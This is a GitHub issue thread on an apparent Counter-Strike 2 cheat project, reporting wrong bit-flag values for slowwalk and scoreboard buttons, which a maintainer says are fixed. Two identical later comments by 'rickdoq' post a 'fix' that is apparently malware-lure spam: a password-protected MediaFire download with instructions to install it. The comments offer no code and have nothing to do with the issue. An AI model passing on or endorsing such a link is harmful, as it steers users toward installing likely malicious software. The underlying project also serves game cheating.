### ISSUE TITLE
 Not all values of ECommandButtons are correct

### ISSUE THREAD

**Issue by M3351AN** [maecry/asphyxia-cs2#119]
**Describe the bug**
https://github.com/maecry/asphyxia-cs2/blob/d277fc880e1fc8f2347b31b016652b12fc0fd43d/cstrike/sdk/datatypes/usercmd.h#L12
Not all values of ECommandButtons are correct

**To Reproduce**
1.Chk slowwalk / scoreboard .etc
2.false result
**Expected behavior**
1.Chk slowwalk / scoreboard .etc
2.correct result
**Screenshots**
![image](https://github.com/user-attachments/assets/e0e438c5-dcca-4195-87d7-ac637d162f14)
![image](https://github.com/user-attachments/assets/d65d24b0-428d-4760-9101-ed6623ca5201)

**Additional context**
slowwalk should be(1 << 16) insted of (1 << 17) 
scoreboard should be (1 << 33) instead of (1 << 16)

**Comment by Exlodium** [comment]
Fixed with latest commit

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
